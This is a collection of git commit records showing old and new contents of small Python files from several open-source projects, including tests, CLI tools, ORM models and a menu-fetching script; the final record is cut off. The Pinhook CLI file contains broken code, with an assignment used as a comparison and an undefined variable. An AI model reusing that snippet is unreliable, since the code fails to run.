6d0e4c0568d6ad5ee16afd34e30b06a5fb3b58eb | bump version number | laowantong/mocodo,laowantong/mocodo,laowantong/mocodo,laowantong/mocodo,laowantong/mocodo | mocodo/version_number.py | mocodo/version_number.py | version = u"2.1.4" | version = u"2.1.3" | mit | Python |
aeb59440809f9a3ab32bf65752627822ce57b5fa | use AdvectionDiffusion timestepper class for test_IP_diffusion | firedrakeproject/dcore,firedrakeproject/gusto | tests/test_IP_diffusion.py | tests/test_IP_diffusion.py | from gusto import *
from firedrake import PeriodicIntervalMesh, ExtrudedMesh, SpatialCoordinate,\
VectorFunctionSpace, Constant, exp, as_vector
import pytest
def setup_IPdiffusion(dirname, vector, DG):
dt = 0.01
L = 10.
m = PeriodicIntervalMesh(50, L)
mesh = ExtrudedMesh(m, layers=50, layer_height=0.2)
fieldlist = ['u', 'D']
timestepping = TimesteppingParameters(dt=dt)
parameters = CompressibleParameters()
output = OutputParameters(dirname=dirname)
state = State(mesh, vertical_degree=1, horizontal_degree=1,
family="CG",
timestepping=timestepping,
parameters=parameters,
output=output,
fieldlist=fieldlist)
x = SpatialCoordinate(mesh)
if vector:
kappa = Constant([[0.05, 0.], [0., 0.05]])
if DG:
Space = VectorFunctionSpace(mesh, "DG", 1)
else:
Space = state.spaces("HDiv")
fexpr = as_vector([exp(-(L/2.-x[0])**2 - (L/2.-x[1])**2), 0.])
else:
kappa = 0.05
if DG:
Space = state.spaces("DG")
else:
Space = state.spaces("HDiv_v")
fexpr = exp(-(L/2.-x[0])**2 - (L/2.-x[1])**2)
f = state.fields("f", Space)
try:
f.interpolate(fexpr)
except NotImplementedError:
f.project(fexpr)
mu = 5.
f_diffusion = InteriorPenalty(state, f.function_space(), kappa=kappa, mu=mu)
diffused_fields = [("f", f_diffusion)]
stepper = AdvectionDiffusion(state, diffused_fields=diffused_fields)
return stepper
def run(dirname, vector, DG):
stepper = setup_IPdiffusion(dirname, vector, DG)
stepper.run(t=0., tmax=2.5)
return stepper.state.fields("f")
@pytest.mark.parametrize("vector", [True, False])
@pytest.mark.parametrize("DG", [True, False])
def test_ipdiffusion(tmpdir, vector, DG):
dirname = str(tmpdir)
f = run(dirname, vector, DG)
assert f.dat.data.max() < 0.7
| import itertools
from os import path
from gusto import *
from firedrake import PeriodicIntervalMesh, ExtrudedMesh, SpatialCoordinate,\
VectorFunctionSpace, File, Constant, Function, exp, as_vector
import pytest
def setup_IPdiffusion(vector, DG):
dt = 0.01
L = 10.
m = PeriodicIntervalMesh(50, L)
mesh = ExtrudedMesh(m, layers=50, layer_height=0.2)
fieldlist = ['u', 'D']
timestepping = TimesteppingParameters(dt=dt)
parameters = CompressibleParameters()
output = OutputParameters(dirname="IPdiffusion")
state = State(mesh, vertical_degree=1, horizontal_degree=1,
family="CG",
timestepping=timestepping,
parameters=parameters,
output=output,
fieldlist=fieldlist)
x = SpatialCoordinate(mesh)
if vector:
if DG:
Space = VectorFunctionSpace(mesh, "DG", 1)
else:
Space = state.spaces("HDiv")
f = Function(Space, name="f")
fexpr = as_vector([exp(-(L/2.-x[0])**2 - (L/2.-x[1])**2), 0.])
else:
if DG:
Space = state.spaces("DG")
else:
Space = state.spaces("HDiv_v")
f = Function(Space, name='f')
fexpr = exp(-(L/2.-x[0])**2 - (L/2.-x[1])**2)
try:
f.interpolate(fexpr)
except NotImplementedError:
f.project(fexpr)
return state, f
def run(dirname, vector, DG):
state, f = setup_IPdiffusion(vector, DG)
kappa = 0.05
if vector:
kappa = Constant([[0.05, 0.], [0., 0.05]])
mu = 5.
dt = state.timestepping.dt
tmax = 2.5
t = 0.
f_diffusion = InteriorPenalty(state, f.function_space(), kappa=kappa, mu=mu)
outfile = File(path.join(dirname, "IPdiffusion/field_output.pvd"))
dumpcount = itertools.count()
outfile.write(f)
fp1 = Function(f.function_space())
while t < tmax - 0.5*dt:
t += dt
f_diffusion.apply(f, fp1)
f.assign(fp1)
if (next(dumpcount) % 25) == 0:
outfile.write(f)
return f
@pytest.mark.parametrize("vector", [True, False])
@pytest.mark.parametrize("DG", [True, False])
def test_ipdiffusion(tmpdir, vector, DG):
dirname = str(tmpdir)
f = run(dirname, vector, DG)
assert f.dat.data.max() < 0.7
| mit | Python |
8f6921e9fdc294fd6cc0f5701624a27ff63ed1c0 | Add 'Objectiveable' to Objectives, and rename association | NejcZupec/ggrc-core,vladan-m/ggrc-core,jmakov/ggrc-core,jmakov/ggrc-core,hyperNURb/ggrc-core,NejcZupec/ggrc-core,josthkko/ggrc-core,josthkko/ggrc-core,plamut/ggrc-core,jmakov/ggrc-core,edofic/ggrc-core,AleksNeStu/ggrc-core,AleksNeStu/ggrc-core,VinnieJohns/ggrc-core,selahssea/ggrc-core,kr41/ggrc-core,hasanalom/ggrc-core,j0gurt/ggrc-core,uskudnik/ggrc-core,edofic/ggrc-core,hyperNURb/ggrc-core,plamut/ggrc-core,kr41/ggrc-core,VinnieJohns/ggrc-core,prasannav7/ggrc-core,j0gurt/ggrc-core,j0gurt/ggrc-core,plamut/ggrc-core,NejcZupec/ggrc-core,selahssea/ggrc-core,hasanalom/ggrc-core,j0gurt/ggrc-core,selahssea/ggrc-core,plamut/ggrc-core,prasannav7/ggrc-core,vladan-m/ggrc-core,hyperNURb/ggrc-core,selahssea/ggrc-core,vladan-m/ggrc-core,hyperNURb/ggrc-core,vladan-m/ggrc-core,jmakov/ggrc-core,hasanalom/ggrc-core,VinnieJohns/ggrc-core,edofic/ggrc-core,hyperNURb/ggrc-core,vladan-m/ggrc-core,josthkko/ggrc-core,andrei-karalionak/ggrc-core,AleksNeStu/ggrc-core,jmakov/ggrc-core,uskudnik/ggrc-core,kr41/ggrc-core,josthkko/ggrc-core,VinnieJohns/ggrc-core,uskudnik/ggrc-core,hasanalom/ggrc-core,andrei-karalionak/ggrc-core,edofic/ggrc-core,hasanalom/ggrc-core,AleksNeStu/ggrc-core,uskudnik/ggrc-core,uskudnik/ggrc-core,andrei-karalionak/ggrc-core,prasannav7/ggrc-core,kr41/ggrc-core,NejcZupec/ggrc-core,andrei-karalionak/ggrc-core,prasannav7/ggrc-core | src/ggrc/models/objective.py | src/ggrc/models/objective.py | # Copyright (C) 2013 Google Inc., authors, and contributors <see AUTHORS file>
# Licensed under http://www.apache.org/licenses/LICENSE-2.0 <see LICENSE file>
# Created By: dan@reciprocitylabs.com
# Maintained By: dan@reciprocitylabs.com
from ggrc import db
from .associationproxy import association_proxy
from .mixins import deferred, BusinessObject
from .object_document import Documentable
from .object_person import Personable
from .object_objective import Objectiveable
from .reflection import PublishOnly
class Objective(Objectiveable, Documentable, Personable, BusinessObject, db.Model):
__tablename__ = 'objectives'
notes = deferred(db.Column(db.Text), 'Objective')
section_objectives = db.relationship(
'SectionObjective', backref='objective', cascade='all, delete-orphan')
sections = association_proxy(
'section_objectives', 'section', 'SectionObjective')
objective_controls = db.relationship(
'ObjectiveControl', backref='objective', cascade='all, delete-orphan')
controls = association_proxy(
'objective_controls', 'control', 'ObjectiveControl')
objective_objects = db.relationship(
'ObjectObjective', backref='objective', cascade='all, delete-orphan')
_publish_attrs = [
'notes',
PublishOnly('section_objectives'),
'sections',
PublishOnly('objective_controls'),
'controls',
#'object_objectives',
'objective_objects',
]
_sanitize_html = [
'notes',
]
@classmethod
def eager_query(cls):
from sqlalchemy import orm
query = super(Objective, cls).eager_query()
return query.options(
orm.subqueryload_all('section_objectives.section'),
orm.subqueryload_all('objective_controls.control'),
orm.subqueryload_all('objective_objects'))
| # Copyright (C) 2013 Google Inc., authors, and contributors <see AUTHORS file>
# Licensed under http://www.apache.org/licenses/LICENSE-2.0 <see LICENSE file>
# Created By: dan@reciprocitylabs.com
# Maintained By: dan@reciprocitylabs.com
from ggrc import db
from .associationproxy import association_proxy
from .mixins import deferred, BusinessObject
from .object_document import Documentable
from .object_person import Personable
from .reflection import PublishOnly
class Objective(Documentable, Personable, BusinessObject, db.Model):
__tablename__ = 'objectives'
notes = deferred(db.Column(db.Text), 'Objective')
section_objectives = db.relationship(
'SectionObjective', backref='objective', cascade='all, delete-orphan')
sections = association_proxy(
'section_objectives', 'section', 'SectionObjective')
objective_controls = db.relationship(
'ObjectiveControl', backref='objective', cascade='all, delete-orphan')
controls = association_proxy(
'objective_controls', 'control', 'ObjectiveControl')
object_objectives = db.relationship(
'ObjectObjective', backref='objective', cascade='all, delete-orphan')
_publish_attrs = [
'notes',
PublishOnly('section_objectives'),
'sections',
PublishOnly('objective_controls'),
'controls',
'object_objectives',
]
_sanitize_html = [
'notes',
]
@classmethod
def eager_query(cls):
from sqlalchemy import orm
query = super(Objective, cls).eager_query()
return query.options(
orm.subqueryload_all('section_objectives.section'),
orm.subqueryload_all('objective_controls.control'),
orm.subqueryload_all('object_objectives'))
| apache-2.0 | Python |
996486d25a23f2d75384e8c2736ca4735a542283 | Fix obj load function | minoue/miExecutor | module/others/plugins.py | module/others/plugins.py | from maya import cmds
class Commands(object):
""" class name must be 'Commands' """
commandDict = {}
def _loadObjPlugin(self):
if not cmds.pluginInfo("objExport", q=True, loaded=True):
cmds.loadPlugin("objExport")
commandDict['loadObjPlugin'] = "sphere.png"
# ^ Don't forget to add the command to the dictionary.
| from maya import cmds
class Commands(object):
""" class name must be 'Commands' """
commandDict = {}
def _loadObjPlugin(self):
if not cmds.pluginInfo("objExport", q=True, loaded=True):
cmds.loadPlugin("objExport")
commandDict['sampleCommand'] = "sphere.png"
# ^ Don't forget to add the command to the dictionary.
| mit | Python |
f432ad600fdd9b69fb35a1a56c3799a0521e1c04 | add start command | BrianHicks/perch,BrianHicks/perch | perch/bases.py | perch/bases.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
import os
import sys
from .config import constants
from .serializers import serializers
class StdIOHandler(object):
"Provide common I/O handling to the command line"
def __init__(self):
self.config = json.loads(os.environ.get(constants.stage_env_var, '{}'))
self.serializer = serializers.get(self.config.get(
constants.serializer_key, constants.default_serializer
))()
def get_configuration(self):
return self.serializer.dump({
'name': self.name,
'input_tags': self.input_tags,
})
def run(self, args=None):
command = (args or sys.argv)[-1]
if command == 'config':
sys.stdout.write(self.get_configuration() + '\n')
elif command == 'process':
for obj in self.process(sys.stdin):
sys.stdout.write(self.serializer.dump(obj) + '\n')
elif command == 'start':
for obj in self.start():
sys.stdout.write(self.serializer.dump(obj) + '\n')
else:
sys.stderr.write('Cannot do "%s"\n' % command)
class Converter(StdIOHandler):
"Base class for converters"
def process(self, in_file):
"process the file supplied by the superclass"
for line in in_file.readlines():
parsed = self.parse(self.serializer.load(line))
if parsed:
yield parsed
# some converters might want to output files after each file has been
# processed - implement "final" to do that.
try:
for line in self.final():
yield line
except AttributeError:
pass
| #!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
import os
import sys
from .config import constants
from .serializers import serializers
class StdIOHandler(object):
"Provide common I/O handling to the command line"
def __init__(self):
self.config = json.loads(os.environ.get(constants.stage_env_var, '{}'))
self.serializer = serializers.get(self.config.get(
constants.serializer_key, constants.default_serializer
))()
def get_configuration(self):
return self.serializer.dump({
'name': self.name,
'input_tags': self.input_tags,
})
def run(self, args=None):
command = (args or sys.argv)[-1]
if command == 'config':
sys.stdout.write(self.get_configuration() + '\n')
elif command == 'process':
for obj in self.process(sys.stdin):
sys.stdout.write(self.serializer.dump(obj) + '\n')
else:
sys.stderr.write('Cannot do "%s"\n' % command)
class Converter(StdIOHandler):
"Base class for converters"
def process(self, in_file):
"process the file supplied by the superclass"
for line in in_file.readlines():
parsed = self.parse(self.serializer.load(line))
if parsed:
yield parsed
# some converters might want to output files after each file has been
# processed - implement "final" to do that.
try:
for line in self.final():
yield line
except AttributeError:
pass
| bsd-3-clause | Python |
9d61e0bd697cf8cd5086f56f85f6083d29a2f083 | 重构,加入一些注释 | RyanPoy/pyrails | pyactive/relation/relation_methods.py | pyactive/relation/relation_methods.py | # -*- coding:utf-8 -*-
from ..utils import singularize_of, pluralize_of, ColumnNotInColumns
def owner_attr_for_has_one_and_has_belongs_to(self):
""" User has one Phone, owner attr must be 'phone'
Phone belongs to User, owner attr must be 'user'
"""
if self._owner_attr:
return self._owner_attr
if self.owner is None:
return None
from ..record import ActiveRecord # lazy import
if not issubclass(self.owner, ActiveRecord):
return None
target = self.target
if target is None:
return None
self._owner_attr = singularize_of(target.table_name)
return self._owner_attr
def owner_attr_for_has_many(self):
""" User has many Phone, owner attr must be 'phones'
"""
if self._owner_attr:
return self._owner_attr
if self.owner is None:
return None
from ..record import ActiveRecord # lazy import
if not issubclass(self.owner, ActiveRecord):
return None
target = self.target
if target is None:
return None
self._owner_attr = pluralize_of(target.table_name)
return self._owner_attr
def foreign_key_for_belongs_to(self):
""" Phone belongs to User, foreign key must be user_id, and appear in Phone
"""
if self._foreign_key:
return self._foreign_key
if self.owner is None:
return None
from ..record import ActiveRecord # lazy import
if not issubclass(self.owner, ActiveRecord):
return None
target = self.target
if target is None:
return None
foreign_key = singularize_of(target.table_name) + '_id'
if not self.owner.has_column(foreign_key):
raise ColumnNotInColumns('"%s" not in %s columns' % (foreign_key, self.owner.__name__))
self._foreign_key = foreign_key
return self._foreign_key
def foreign_key_for_has_one_and_has_many(self):
""" User has one Phone, foreign key must be user_id, and appear in Phone
User has many Phone, foreign key must be user_id, and appear in Phone
"""
if self._foreign_key:
return self._foreign_key
if self.owner is None:
return None
from ..record import ActiveRecord # lazy import
if not issubclass(self.owner, ActiveRecord):
return None
owner = self.owner
if owner is None:
return None
foreign_key = singularize_of(owner.table_name) + '_id'
if not self.target.has_column(foreign_key):
raise ColumnNotInColumns('"%s" not in %s columns' % (foreign_key, self.target.__name__))
self._foreign_key = foreign_key
return self._foreign_key
| # -*- coding:utf-8 -*-
from ..utils import singularize_of, pluralize_of, ColumnNotInColumns
def owner_attr_for_has_one_and_has_belongs_to(self):
""" for has_one and belongs_to
"""
if self._owner_attr:
return self._owner_attr
if self.owner is None:
return None
from ..record import ActiveRecord # lazy import
if not issubclass(self.owner, ActiveRecord):
return None
target = self.target
if target is None:
return None
self._owner_attr = singularize_of(target.table_name)
return self._owner_attr
def owner_attr_for_has_many(self):
""" for has_many
"""
if self._owner_attr:
return self._owner_attr
if self.owner is None:
return None
from ..record import ActiveRecord # lazy import
if not issubclass(self.owner, ActiveRecord):
return None
target = self.target
if target is None:
return None
self._owner_attr = pluralize_of(target.table_name)
return self._owner_attr
def foreign_key_for_belongs_to(self):
"""Phone belongs to User
owner_column must be user_id
"""
if self._foreign_key:
return self._foreign_key
if self.owner is None:
return None
from ..record import ActiveRecord # lazy import
if not issubclass(self.owner, ActiveRecord):
return None
target = self.target
if target is None:
return None
foreign_key = singularize_of(target.table_name) + '_id'
if not self.owner.has_column(foreign_key):
raise ColumnNotInColumns('"%s" not in %s columns' % (foreign_key, self.owner.__name__))
self._foreign_key = foreign_key
return self._foreign_key
def foreign_key_for_has_one_and_has_many(self):
"""Phone belongs to User
owner_column must be user_id
"""
if self._foreign_key:
return self._foreign_key
if self.owner is None:
return None
from ..record import ActiveRecord # lazy import
if not issubclass(self.owner, ActiveRecord):
return None
owner = self.owner
if owner is None:
return None
foreign_key = singularize_of(owner.table_name) + '_id'
if not self.target.has_column(foreign_key):
raise ColumnNotInColumns('"%s" not in %s columns' % (foreign_key, self.target.__name__))
self._foreign_key = foreign_key
return self._foreign_key
| mit | Python |
de89e3c3cf0eee28693f33f26b9b9b24e8def64e | Change 'http' to 'https' for SonarCloud | jadolg/rocketchat_API | tests/test_integrations.py | tests/test_integrations.py | from uuid import uuid1
import pytest
@pytest.fixture(autouse=True)
def integrations_create_webhook_incoming(logged_rocket):
return logged_rocket.integrations_create(
integrations_type="webhook-incoming",
name=str(uuid1()),
enabled=True,
username=logged_rocket.me().json().get("username"),
channel="#general",
script_enabled=False,
).json()
def test_integrations_create(integrations_create_webhook_incoming, logged_rocket):
integration_webhook_incoming = integrations_create_webhook_incoming
assert integration_webhook_incoming.get("success")
integration_webhook_outgoing = logged_rocket.integrations_create(
integrations_type="webhook-incoming",
name=str(uuid1()),
enabled=True,
event="sendMessage",
username=logged_rocket.me().json().get("username"),
urls=["https://example.com/fake"],
channel="#general",
script_enabled=False,
).json()
assert integration_webhook_outgoing.get("success")
def test_integrations_get(integrations_create_webhook_incoming, logged_rocket):
integration_id = integrations_create_webhook_incoming.get("integration").get("_id")
assert logged_rocket.integrations_get(integration_id).json().get("success")
def test_integrations_history(integrations_create_webhook_incoming, logged_rocket):
integration_id = integrations_create_webhook_incoming.get("integration").get("_id")
assert logged_rocket.integrations_history(integration_id).json().get("success")
def test_integrations_list(logged_rocket):
assert logged_rocket.integrations_list().json().get("success")
def test_integrations_remove(integrations_create_webhook_incoming, logged_rocket):
integration = integrations_create_webhook_incoming.get("integration")
assert (
logged_rocket.integrations_remove(
integration.get("type"), integration.get("_id")
)
.json()
.get("success")
)
def test_integrations_update(integrations_create_webhook_incoming, logged_rocket):
integration_id = integrations_create_webhook_incoming.get("integration").get("_id")
assert (
logged_rocket.integrations_update(
integrations_type="webhook-incoming",
name=str(uuid1()),
enabled=False,
username=logged_rocket.me().json().get("username"),
channel="#general",
script_enabled=False,
integration_id=integration_id,
)
.json()
.get("success")
)
| from uuid import uuid1
import pytest
@pytest.fixture(autouse=True)
def integrations_create_webhook_incoming(logged_rocket):
return logged_rocket.integrations_create(
integrations_type="webhook-incoming",
name=str(uuid1()),
enabled=True,
username=logged_rocket.me().json().get("username"),
channel="#general",
script_enabled=False,
).json()
def test_integrations_create(integrations_create_webhook_incoming, logged_rocket):
integration_webhook_incoming = integrations_create_webhook_incoming
assert integration_webhook_incoming.get("success")
integration_webhook_outgoing = logged_rocket.integrations_create(
integrations_type="webhook-incoming",
name=str(uuid1()),
enabled=True,
event="sendMessage",
username=logged_rocket.me().json().get("username"),
urls=["http://example.com/fake"],
channel="#general",
script_enabled=False,
).json()
assert integration_webhook_outgoing.get("success")
def test_integrations_get(integrations_create_webhook_incoming, logged_rocket):
integration_id = integrations_create_webhook_incoming.get("integration").get("_id")
assert logged_rocket.integrations_get(integration_id).json().get("success")
def test_integrations_history(integrations_create_webhook_incoming, logged_rocket):
integration_id = integrations_create_webhook_incoming.get("integration").get("_id")
assert logged_rocket.integrations_history(integration_id).json().get("success")
def test_integrations_list(logged_rocket):
assert logged_rocket.integrations_list().json().get("success")
def test_integrations_remove(integrations_create_webhook_incoming, logged_rocket):
integration = integrations_create_webhook_incoming.get("integration")
assert (
logged_rocket.integrations_remove(
integration.get("type"), integration.get("_id")
)
.json()
.get("success")
)
def test_integrations_update(integrations_create_webhook_incoming, logged_rocket):
integration_id = integrations_create_webhook_incoming.get("integration").get("_id")
assert (
logged_rocket.integrations_update(
integrations_type="webhook-incoming",
name=str(uuid1()),
enabled=False,
username=logged_rocket.me().json().get("username"),
channel="#general",
script_enabled=False,
integration_id=integration_id,
)
.json()
.get("success")
)
| mit | Python |
cd20c89ffa34538437a41e2416be3168aab14926 | add placeholder | marshki/pyWipe,marshki/pyWipe | tests/test_user_is_root.py | tests/test_user_is_root.py | import os
import sys
"""Placeholder.
"""
def user_is_root():
"""Check if current UID is 0.
"""
if os.getuid() != 0:
print("This program requires ROOT privileges. Exiting.")
sys.exit()
user_is_root()
| import os
import sys
def user_is_root():
"""Check if current UID is 0.
"""
if os.getuid() != 0:
print("This program requires ROOT privileges. Exiting.")
sys.exit()
user_is_root()
| mit | Python |
f0e172872435307d5fe3ac48ff7c2ed0b3df5759 | split up integration and unit tests, the sqlite tests take longer than i'd like, do as much unit testing as possible -- adding some unit tests for player height/weight conversion | fancystats/nhlstats | tests/unit/models_tests.py | tests/unit/models_tests.py | import unittest
from nhlstats.models import Player
class TestModelPlayer(unittest.TestCase):
def test_height_na(self):
p = Player()
self.assertEqual(p.height, None)
self.assertEqual(p.height_imperial, 'N/A')
self.assertEqual(p.height_metric, 'N/A')
p = Player(height=0)
self.assertEqual(p.height, 0)
self.assertEqual(p.height_imperial, 'N/A')
self.assertEqual(p.height_metric, 'N/A')
def test_weight_na(self):
p = Player()
self.assertEqual(p.weight, None)
self.assertEqual(p.weight_imperial, 'N/A')
self.assertEqual(p.weight_metric, 'N/A')
p = Player(weight=0)
self.assertEqual(p.weight, 0)
self.assertEqual(p.weight_imperial, 'N/A')
self.assertEqual(p.weight_metric, 'N/A')
def test_height_imperial(self):
p = Player(height=72)
self.assertEqual(p.height_imperial, '6\'0"')
p = Player(height=71)
self.assertEqual(p.height_imperial, '5\'11"')
def height_metric(self):
p = Player(height=72)
self.assertEqual(p.height_metric, '144cm')
def test_weight_imperial(self):
p = Player(weight=175)
self.assertEqual(p.weight_imperial, '175lbs')
def test_weight_metric(self):
p = Player(weight=175)
self.assertEqual(p.weight_metric, '79.0kg')
| import unittest
from nhlstats.models import Player
class TestModelPlayer(unittest.TestCase):
def test_height_na(self):
p = Player()
self.assertEqual(p.height_imperial, 'N/A') | mit | Python |
ee274d44eec39bd0ff886b5fd4818d43896b8210 | Change default resolution | Ajnasz/pippo,Ajnasz/pippo,Ajnasz/pippo | photodaemon.py | photodaemon.py | import picamera
import redis
import time
def take_photo():
camera = picamera.PiCamera()
camera.resolution = (1280, 720)
camera.capture('static/photo.jpg')
camera.close()
r.publish('photo', time.time())
r = redis.StrictRedis(host='localhost', port=6379, db=0)
p = r.pubsub()
p.subscribe('take-photo')
while True:
message = p.get_message()
if message:
take_photo()
time.sleep(0.005)
| import picamera
import redis
import time
def take_photo():
camera = picamera.PiCamera()
camera.capture('static/photo.jpg')
camera.close()
r.publish('photo', time.time())
r = redis.StrictRedis(host='localhost', port=6379, db=0)
p = r.pubsub()
p.subscribe('take-photo')
while True:
message = p.get_message()
if message:
take_photo()
time.sleep(0.005)
| mit | Python |
93cb2784eedda59aa725198b6a2bb49d9cba3fe9 | add arguments | archangelic/pinhook | pinhook/cli.py | pinhook/cli.py | import click
from .bot import Bot
from marshmallow import Schema, fields, validate, INCLUDE
class Config(Schema):
nickname = fields.Str(required=True)
channels = fields.List(fields.Str(), required=True)
server = fields.Str(required=True)
port = fields.Int()
ops = fields.List(fields.Str())
ssl_required = fields.Bool()
plugin_dir = fields.Str()
ns_pass = fields.Str()
log_level = fields.Str(validate=validate.OneOf(['debug', 'warn', 'info', 'off', 'error']))
server_pass = fields.Str()
class Meta:
unknown = INCLUDE
def read_conf(config, conf_format):
schema = Config()
if not conf_format:
if config.name.endswith('.json'):
conf_format = 'json'
elif config.name.endswith(('.yaml', '.yml')):
conf_format = 'yaml'
elif config.name.endswith(('.toml', '.tml')):
conf_format = 'toml'
else:
click.echo('Could not detect file format, please supply using --format option', err=True)
if conf_type == 'json':
import json
to_json = json.loads(config.read())
output = schema.load(to_json)
elif conf_type == 'yaml':
try:
import yaml
except ImportError:
click.echo('yaml not installed, please use `pip3 install pinhook[yaml]` to install', err=True)
else:
to_yaml = yaml.load(config.read())
output = schema.load(to_yaml)
elif conf_type = 'toml':
try:
import toml
except ImportError:
click.echo('toml not installed, please use `pip3 install pinhook[toml]` to install', err=True)
else:
to_toml = toml.loads(config.read())
output = schema.loads(to_toml)
return output
@click.command()
@click.argument('config', type=click.File('rb'))
@click.option('--format', '-f', 'conf_format', type=click.Choice(['json', 'yaml', 'toml']))
def cli(config, conf_format):
config = read_conf(config, conf_format)
bot = Bot(**config)
bot.start()
| import click
from .bot import Bot
from marshmallow import Schema, fields, validate, INCLUDE
class Config(Schema):
nickname = fields.Str(required=True)
channels = fields.List(fields.Str(), required=True)
server = fields.Str(required=True)
port = fields.Int()
ops = fields.List(fields.Str())
ssl_required = fields.Bool()
plugin_dir = fields.Str()
ns_pass = fields.Str()
log_level = fields.Str(validate=validate.OneOf(['debug', 'warn', 'info', 'off', 'error']))
server_pass = fields.Str()
class Meta:
unknown = INCLUDE
def read_conf(config):
schema = Config()
if not conf_format:
if config.name.endswith('.json'):
conf_format = 'json'
elif config.name.endswith(('.yaml', '.yml')):
conf_format = 'yaml'
elif config.name.endswith(('.toml', '.tml')):
conf_format = 'toml'
else:
click.echo('Could not detect file format, please supply using --format option', err=True)
if conf_type == 'json':
import json
to_json = json.loads(config.read())
output = schema.load(to_json)
elif conf_type == 'yaml':
try:
import yaml
except ImportError:
click.echo('yaml not installed, please use `pip3 install pinhook[yaml]` to install', err=True)
else:
to_yaml = yaml.load(config.read())
output = schema.load(to_yaml)
elif conf_type = 'toml':
try:
import toml
except ImportError:
click.echo('toml not installed, please use `pip3 install pinhook[toml]` to install', err=True)
else:
to_toml = toml.loads(config.read())
output = schema.loads(to_toml)
return output
@click.command()
@click.argument('config', type=click.File('rb'))
@click.option('--format', '-f', 'conf_format', type=click.Choice(['json', 'yaml', 'toml']))
def cli(config):
config = read_conf(config, conf_format)
bot = Bot(**config)
bot.start()
| mit | Python |
1046e53c2f6068be9ff7c0ecb62ca665e08fccb4 | Tweak Sentry init to allow running from default settings.py. | UrbanCCD-UChicago/plenario,UrbanCCD-UChicago/plenario,UrbanCCD-UChicago/plenario | plenario/__init__.py | plenario/__init__.py | from flask import Flask, render_template, redirect, url_for, request
from raven.contrib.flask import Sentry
from plenario.database import session as db_session
from plenario.models import bcrypt
from plenario.api import api, cache
from plenario.auth import auth, login_manager
from plenario.views import views
from plenario.utils.helpers import mail, slugify as slug
from plenario.settings import PLENARIO_SENTRY_URL
# Unless PLENARIO_SENTRY_URL specified in settings, don't try to start raven.
sentry = None
if PLENARIO_SENTRY_URL:
sentry = Sentry(dsn=PLENARIO_SENTRY_URL)
def create_app():
app = Flask(__name__)
app.config.from_object('plenario.settings')
app.url_map.strict_slashes = False
login_manager.init_app(app)
login_manager.login_view = "auth.login"
bcrypt.init_app(app)
mail.init_app(app)
if sentry:
sentry.init_app(app)
app.register_blueprint(api)
app.register_blueprint(views)
app.register_blueprint(auth)
cache.init_app(app)
@app.before_request
def check_maintenance_mode():
"""
If maintenance mode is turned on in settings.py,
Disable the API and the interactive pages in the explorer.
"""
maint = app.config.get('MAINTENANCE')
maint_pages = ['/v1/api', '/explore', '/admin']
maint_on = False
for m in maint_pages:
if m in request.path:
maint_on = True
if maint and maint_on and request.path != url_for('views.maintenance'):
return redirect(url_for('views.maintenance'))
@app.teardown_appcontext
def shutdown_session(exception=None):
db_session.remove()
@app.errorhandler(404)
def page_not_found(e):
return render_template('404.html'), 404
@app.errorhandler(500)
def page_not_found(e):
return render_template('error.html'), 500
@app.template_filter('slugify')
def slugify(s):
return slug(s)
@app.template_filter('format_number')
def reverse_filter(s):
return '{:,}'.format(s)
@app.template_filter('format_date_sort')
def reverse_filter(s):
if s:
return s.strftime('%Y%m%d%H%M')
else:
return '0'
return app
| import os
from flask import Flask, render_template, redirect, url_for, request
from raven.contrib.flask import Sentry
from plenario.database import session as db_session
from plenario.models import bcrypt
from plenario.api import api, cache
from plenario.auth import auth, login_manager
from plenario.views import views
from plenario.utils.helpers import mail, slugify as slug
from urllib import quote_plus
from plenario.settings import PLENARIO_SENTRY_URL
try:
sentry = Sentry(dsn=PLENARIO_SENTRY_URL)
except KeyError:
sentry = None
def create_app():
app = Flask(__name__)
app.config.from_object('plenario.settings')
app.url_map.strict_slashes = False
login_manager.init_app(app)
login_manager.login_view = "auth.login"
bcrypt.init_app(app)
mail.init_app(app)
if sentry:
sentry.init_app(app)
app.register_blueprint(api)
app.register_blueprint(views)
app.register_blueprint(auth)
cache.init_app(app)
@app.before_request
def check_maintenance_mode():
maint = app.config.get('MAINTENANCE')
maint_pages = ['/v1/api', '/explore', '/admin']
maint_on = False
for m in maint_pages:
if m in request.path:
maint_on = True
if maint and maint_on and request.path != url_for('views.maintenance'):
return redirect(url_for('views.maintenance'))
@app.teardown_appcontext
def shutdown_session(exception=None):
db_session.remove()
@app.errorhandler(404)
def page_not_found(e):
return render_template('404.html'), 404
@app.errorhandler(500)
def page_not_found(e):
return render_template('error.html'), 500
@app.template_filter('slugify')
def slugify(s):
return slug(s)
@app.template_filter('format_number')
def reverse_filter(s):
return '{:,}'.format(s)
@app.template_filter('format_date_sort')
def reverse_filter(s):
if s:
return s.strftime('%Y%m%d%H%M')
else:
return '0'
return app
| mit | Python |
a60102ea950c44431097576d74921ea4867fb197 | Remove urllib and use requests | thepieterdc/ugent-food | ugent-food.py | ugent-food.py | #!/usr/bin/env python3
import json
import datetime
import requests
import sys
from urllib.error import HTTPError
def header(text, fillchar='-', width=40):
tofill = max(width - 4 - len(text), 0)
leftpad = tofill // 2
print('{}[ {} ]{}'.format(
fillchar * leftpad,
text,
fillchar * (tofill - leftpad),
))
# What day
weekdagen = ('ma', 'di', 'wo', 'do', 'vr', 'za', 'zo')
deltas = {'morgen': 1,
'overmorgen': 2,
'volgende': 7}
d = datetime.date.today()
sys.argv.pop(0)
if sys.argv:
if sys.argv[0] in deltas:
d += datetime.timedelta(deltas[sys.argv[0]])
sys.argv.pop(0)
if sys.argv and sys.argv[0][0:2] in weekdagen:
while d.weekday() != weekdagen.index(sys.argv[0][0:2]):
d += datetime.timedelta(1)
# Fetch from API
try:
menu = requests.get("http://zeus.ugent.be/hydra/api/2.0/resto/menu/nl/{}/{}/{}.json".format(d.year, d.month, d.day)).json()
# Print menu
header(str(d), fillchar='=')
header('SOEP')
for s in menu["meals"]:
if s["kind"] == "soup":
print("* {}".format(s["name"]))
header('HOOFDGERECHTEN')
for m in menu["meals"]:
if m["kind"] == "meat":
print("* Vlees: {}".format(m["name"]))
elif m["kind"] == "fish":
print("* Vis: {}".format(m["name"]))
elif m["kind"] == "vegetarian":
print("* Vegetarisch: {}".format(m["name"]))
header('GROENTEN')
for v in menu["vegetables"]:
print("* {}".format(v))
except HTTPError:
exit("Restaurant gesloten")
| #!/usr/bin/env python3
import json
import datetime
import sys
import urllib.request
from urllib.error import HTTPError
def header(text, fillchar='-', width=40):
